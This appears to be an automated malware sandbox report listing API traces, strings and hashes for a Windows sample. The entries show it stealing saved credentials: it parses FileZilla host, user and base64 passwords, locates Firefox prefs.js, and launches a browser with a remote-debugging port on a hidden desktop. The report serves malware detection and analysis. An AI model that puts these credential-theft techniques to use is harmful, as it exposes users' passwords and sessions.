                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: b01565c31f79055b195ca055354a92bfb806d61bf0235ab2be1a6fc492ed8c69
                        • Instruction ID: b3de5bc543753d3f791973ae1c6d219904ca6bdbc054558a3aecc628660c77a6
                        • Opcode Fuzzy Hash: b01565c31f79055b195ca055354a92bfb806d61bf0235ab2be1a6fc492ed8c69
                        • Instruction Fuzzy Hash: 91524D71A106169FDB21EFA8ED89BAE77B9AF84300F144424F815F7291DF74EC058B90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916B9D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916BCD
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916BFD
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916C2F
                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00916C3C
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00916C43
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00916C5A
                        • lstrlen.KERNEL32(00000000), ref: 00916C65
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916CA8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916CCF
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00916CE2
                        • lstrlen.KERNEL32(00000000), ref: 00916CED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916D30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916D57
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00916D6A
                        • lstrlen.KERNEL32(00000000), ref: 00916D75
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916DB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916DDF
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00916DF2
                        • lstrlen.KERNEL32(00000000), ref: 00916E01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916E49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916E71
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00916E94
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00916EA8
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00916EC9
                        • LocalFree.KERNEL32(00000000), ref: 00916ED4
                        • lstrlen.KERNEL32(?), ref: 00916F6E
                        • lstrlen.KERNEL32(?), ref: 00916F81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 2641759534-2314656281
                        • Opcode ID: fcee2d2f4a18650a0868209eeed56174e75f3f6566c609dae480e1f57017c2e4
                        • Instruction ID: 8e9530c2614adb4973693d59673fe732d0c266c960bf3d3f9abb5c9746b7382f
                        • Opcode Fuzzy Hash: fcee2d2f4a18650a0868209eeed56174e75f3f6566c609dae480e1f57017c2e4
                        • Instruction Fuzzy Hash: C2029170B1521AAFCB11ABB8DE4DBAE7BB9AF44700F244414F802E7291DF74DD418BA0
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00914B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914B7F
                        • lstrlen.KERNEL32(00934CA8), ref: 00914B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914BA7
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 00914BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00914BFA
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: prefs.js
                        • API String ID: 2567437900-3783873740
                        • Opcode ID: 359e202e13c621a7ad2590565ed597d39f215c92c4b6df2b5fd25836416148ca
                        • Instruction ID: b61282f3f76abec3ab5ad51f5a34da981fe2e15bb5273254ae120230f6fa6e8c
                        • Opcode Fuzzy Hash: 359e202e13c621a7ad2590565ed597d39f215c92c4b6df2b5fd25836416148ca
                        • Instruction Fuzzy Hash: 90923170B01609DFDB25CF29D948B99B7E9AF84314F2A806DE4199B3A1DB71DC82CF40
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00911291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009112B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009112BF
                        • lstrlen.KERNEL32(00934CA8), ref: 009112CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009112E7
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 009112F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0091133A
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091135C
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00911376
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009113AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 009113D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009113E2
                        • lstrlen.KERNEL32(00931794), ref: 009113ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091140A
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911416
                        • lstrlen.KERNEL32(?), ref: 00911423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911443
                        • lstrcat.KERNEL32(00000000,?), ref: 00911451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091147A
                        • StrCmpCA.SHLWAPI(?,015EE1D0), ref: 009114A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 009114E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911535
                        • StrCmpCA.SHLWAPI(?,015EF130), ref: 00911552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911593
                        • lstrcpy.KERNEL32(00000000,?), ref: 009115BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009115E4
                        • StrCmpCA.SHLWAPI(?,015EE3C8), ref: 00911602
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911633
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091165C
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911685
                        • StrCmpCA.SHLWAPI(?,015EE440), ref: 009116B3
                        • lstrcpy.KERNEL32(00000000,?), ref: 009116F4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091171D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911745
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009117BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 009117F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091181C
                        • FindClose.KERNEL32(00000000), ref: 0091182B
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: 3906c972e2ecf23050b31b6d952fbd3ea5cf6ee4d99a827bc61d3adcaf9e716c
                        • Instruction ID: c6346bbfb879aee06bb49304e3e0f7f1865c1abf8534df6a0b53b7e52a47dc3a
                        • Opcode Fuzzy Hash: 3906c972e2ecf23050b31b6d952fbd3ea5cf6ee4d99a827bc61d3adcaf9e716c
                        • Instruction Fuzzy Hash: 01128270B1160AAFCB25EF78D989AEE77B8AF84300F144528F956E7290DF34DC458B90
                        APIs
                        • wsprintfA.USER32 ref: 0091CBFC
                        • FindFirstFileA.KERNEL32(?,?), ref: 0091CC13
                        • lstrcat.KERNEL32(?,?), ref: 0091CC5F
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091CC71
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0091CC8B
                        • wsprintfA.USER32 ref: 0091CCB0
                        • PathMatchSpecA.SHLWAPI(?,015E8A28), ref: 0091CCE2
                        • CoInitialize.OLE32(00000000), ref: 0091CCEE
                          • Part of subcall function 0091CAE0: CoCreateInstance.COMBASE(0092B110,00000000,00000001,0092B100,?), ref: 0091CB06
                          • Part of subcall function 0091CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0091CB46
                          • Part of subcall function 0091CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0091CBC9
                        • CoUninitialize.COMBASE ref: 0091CD09
                        • lstrcat.KERNEL32(?,?), ref: 0091CD2E
                        • lstrlen.KERNEL32(?), ref: 0091CD3B
                        • StrCmpCA.SHLWAPI(?,0092CFEC), ref: 0091CD55
                        • wsprintfA.USER32 ref: 0091CD7D
                        • wsprintfA.USER32 ref: 0091CD9C
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0091CDB0
                        • wsprintfA.USER32 ref: 0091CDD8
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0091CDF1
                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0091CE10
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 0091CE28
                        • CloseHandle.KERNEL32(00000000), ref: 0091CE33
                        • CloseHandle.KERNEL32(00000000), ref: 0091CE3F
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0091CE54
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091CE94
                        • FindNextFileA.KERNEL32(?,?), ref: 0091CF8D
                        • FindClose.KERNEL32(?), ref: 0091CF9F
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                        • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 3860919712-2388001722
                        • Opcode ID: 4eb781369559a84deac76c87d7ab54850cde8783268a6e968508b1d081960f7e
                        • Instruction ID: 2304e9a2159c3a1035362240e28e882c0077e0cb54d3c45b77bf91c29a1b0efe
                        • Opcode Fuzzy Hash: 4eb781369559a84deac76c87d7ab54850cde8783268a6e968508b1d081960f7e
                        • Instruction Fuzzy Hash: 0CC162B1A00219AFDB64DF64DC49BEE7779BF84300F144599F50AA7290DE30AE85CF91
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00911291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009112B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009112BF
                        • lstrlen.KERNEL32(00934CA8), ref: 009112CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009112E7
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 009112F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0091133A
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091135C
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00911376
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009113AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 009113D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009113E2
                        • lstrlen.KERNEL32(00931794), ref: 009113ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091140A
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911416
                        • lstrlen.KERNEL32(?), ref: 00911423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911443
                        • lstrcat.KERNEL32(00000000,?), ref: 00911451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091147A
                        • StrCmpCA.SHLWAPI(?,015EE1D0), ref: 009114A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 009114E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911535
                        • StrCmpCA.SHLWAPI(?,015EF130), ref: 00911552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911593
                        • lstrcpy.KERNEL32(00000000,?), ref: 009115BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009115E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009117BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 009117F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091181C
                        • FindClose.KERNEL32(00000000), ref: 0091182B
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: e7d12db2faf3846d0a62054f453ea5f030b4dad143b6291e3dc7ec32c7982767
                        • Instruction ID: 246c47af742cd95d2bc4aaa8e16555690764da6916ea210a30b63c35d03d8629
                        • Opcode Fuzzy Hash: e7d12db2faf3846d0a62054f453ea5f030b4dad143b6291e3dc7ec32c7982767
                        • Instruction Fuzzy Hash: 55C17E31B1160AAFCB21EF78DD89AEE77B8AF84700F144428B956A7291DF34DC458B90
                        APIs
                        • memset.MSVCRT ref: 00909790
                        • lstrcat.KERNEL32(?,?), ref: 009097A0
                        • lstrcat.KERNEL32(?,?), ref: 009097B1
                        • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 009097C3
                        • memset.MSVCRT ref: 009097D7
                          • Part of subcall function 00923E70: lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00923EA5
                          • Part of subcall function 00923E70: lstrcpy.KERNEL32(00000000,015EF288), ref: 00923ECF
                          • Part of subcall function 00923E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0090134E,?,0000001A), ref: 00923ED9
                        • wsprintfA.USER32 ref: 00909806
                        • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00909827
                        • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00909844
                          • Part of subcall function 009246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009246B9
                          • Part of subcall function 009246A0: Process32First.KERNEL32(00000000,00000128), ref: 009246C9
                          • Part of subcall function 009246A0: Process32Next.KERNEL32(00000000,00000128), ref: 009246DB
                          • Part of subcall function 009246A0: StrCmpCA.SHLWAPI(?,?), ref: 009246ED
                          • Part of subcall function 009246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00924702
                          • Part of subcall function 009246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00924711
                          • Part of subcall function 009246A0: CloseHandle.KERNEL32(00000000), ref: 00924718
                          • Part of subcall function 009246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00924726
                          • Part of subcall function 009246A0: CloseHandle.KERNEL32(00000000), ref: 00924731
                        • lstrcat.KERNEL32(00000000,?), ref: 00909878
                        • lstrcat.KERNEL32(00000000,?), ref: 00909889
                        • lstrcat.KERNEL32(00000000,00934B60), ref: 0090989B
                        • memset.MSVCRT ref: 009098AF
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009098D4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00909903
                        • StrStrA.SHLWAPI(00000000,015F00C0), ref: 00909919
                        • lstrcpyn.KERNEL32(00B393D0,00000000,00000000), ref: 00909938
                        • lstrlen.KERNEL32(?), ref: 0090994B
                        • wsprintfA.USER32 ref: 0090995B
                        • lstrcpy.KERNEL32(?,00000000), ref: 00909971
                        • Sleep.KERNEL32(00001388), ref: 009099E7
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                          • Part of subcall function 009092B0: strlen.MSVCRT ref: 009092E1
                          • Part of subcall function 009092B0: strlen.MSVCRT ref: 009092FA
                          • Part of subcall function 009092B0: strlen.MSVCRT ref: 00909399
                          • Part of subcall function 009092B0: strlen.MSVCRT ref: 009093E6
                          • Part of subcall function 00924740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00924759
                          • Part of subcall function 00924740: Process32First.KERNEL32(00000000,00000128), ref: 00924769
                          • Part of subcall function 00924740: Process32Next.KERNEL32(00000000,00000128), ref: 0092477B
                          • Part of subcall function 00924740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092479C
                          • Part of subcall function 00924740: TerminateProcess.KERNEL32(00000000,00000000), ref: 009247AB
                          • Part of subcall function 00924740: CloseHandle.KERNEL32(00000000), ref: 009247B2
                          • Part of subcall function 00924740: Process32Next.KERNEL32(00000000,00000128), ref: 009247C0
                          • Part of subcall function 00924740: CloseHandle.KERNEL32(00000000), ref: 009247CB
                        • CloseDesktop.USER32(?), ref: 00909A1C
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                        • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                        • API String ID: 958055206-1862457068
                        • Opcode ID: eba704ae997482bb3ffacbdab5baf3ac9df6e76c584b95fe1c07cefc82b9aa0d
                        • Instruction ID: f2a083167af5fa1b54d1c14b20daaaefcb3f3c56544d1c56ed5d50e0741a490c
                        • Opcode Fuzzy Hash: eba704ae997482bb3ffacbdab5baf3ac9df6e76c584b95fe1c07cefc82b9aa0d
                        • Instruction Fuzzy Hash: C6914471A50218AFDB14DFA4DC89FDE77B9AF88700F204595F609A71D1DF70AA448FA0
                        APIs
                        • wsprintfA.USER32 ref: 0091E22C
                        • FindFirstFileA.KERNEL32(?,?), ref: 0091E243
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091E263
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0091E27D
                        • wsprintfA.USER32 ref: 0091E2A2
                        • StrCmpCA.SHLWAPI(?,0092CFEC), ref: 0091E2B4
                        • wsprintfA.USER32 ref: 0091E2D1
                          • Part of subcall function 0091EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0091EE12
                        • wsprintfA.USER32 ref: 0091E2F0
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0091E304
                        • lstrcat.KERNEL32(?,015F01A8), ref: 0091E335
                        • lstrcat.KERNEL32(?,00931794), ref: 0091E347
                        • lstrcat.KERNEL32(?,?), ref: 0091E358
                        • lstrcat.KERNEL32(?,00931794), ref: 0091E36A
                        • lstrcat.KERNEL32(?,?), ref: 0091E37E
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0091E394
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E3D2
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E422
                        • DeleteFileA.KERNEL32(?), ref: 0091E45C
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091E49B
                        • FindClose.KERNEL32(00000000), ref: 0091E4AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                        • String ID: %s\%s$%s\*
                        • API String ID: 1375681507-2848263008
                        • Opcode ID: 77dbc91e4b31352563a70258d19f229defb2e299a8d2a99ef53fccfa3de4a2fe
                        • Instruction ID: 189770034179480d8754832c1616d7ee3fe51a317509a85c50933cc302dcf3c1
                        • Opcode Fuzzy Hash: 77dbc91e4b31352563a70258d19f229defb2e299a8d2a99ef53fccfa3de4a2fe
                        • Instruction Fuzzy Hash: 72818371A0021CAFCB24EF74DD49AEE7779BF84300F144998B91A97191DF74AA88CF90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009016E2
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090176C
                        • lstrcat.KERNEL32(00000000), ref: 00901776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009017A2
                        • lstrcpy.KERNEL32(00000000,?), ref: 009018F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009018FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat
                        • String ID: \*.*
                        • API String ID: 2276651480-1173974218
                        • Opcode ID: 50a1d7a2b2b0debd8dce3187e9374e29ad24cb4654e3f4a27f7b4ff9b723d787
                        • Instruction ID: fc1cfd212210eca23e9405e33da0aae5ccb19006a8b2c85b5517b699ba6d179e
                        • Opcode Fuzzy Hash: 50a1d7a2b2b0debd8dce3187e9374e29ad24cb4654e3f4a27f7b4ff9b723d787
                        • Instruction Fuzzy Hash: 68819531A1061A9FCB22EF68EE89BAE77B9AF84700F140124F815A72D1DF30DD45CB91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0091DD45
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0091DD4C
                        • wsprintfA.USER32 ref: 0091DD62
                        • FindFirstFileA.KERNEL32(?,?), ref: 0091DD79
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091DD9C
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0091DDB6
                        • wsprintfA.USER32 ref: 0091DDD4
                        • DeleteFileA.KERNEL32(?), ref: 0091DE20
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0091DDED
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                          • Part of subcall function 0091D980: memset.MSVCRT ref: 0091D9A1
                          • Part of subcall function 0091D980: memset.MSVCRT ref: 0091D9B3
                          • Part of subcall function 0091D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091D9DB
                          • Part of subcall function 0091D980: lstrcpy.KERNEL32(00000000,?), ref: 0091DA0E
                          • Part of subcall function 0091D980: lstrcat.KERNEL32(?,00000000), ref: 0091DA1C
                          • Part of subcall function 0091D980: lstrcat.KERNEL32(?,015EFFD0), ref: 0091DA36
                          • Part of subcall function 0091D980: lstrcat.KERNEL32(?,?), ref: 0091DA4A
                          • Part of subcall function 0091D980: lstrcat.KERNEL32(?,015EE290), ref: 0091DA5E
                          • Part of subcall function 0091D980: lstrcpy.KERNEL32(00000000,?), ref: 0091DA8E
                          • Part of subcall function 0091D980: GetFileAttributesA.KERNEL32(00000000), ref: 0091DA95
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0091DE2E
                        • FindClose.KERNEL32(00000000), ref: 0091DE3D
                        • lstrcat.KERNEL32(?,015F01A8), ref: 0091DE66
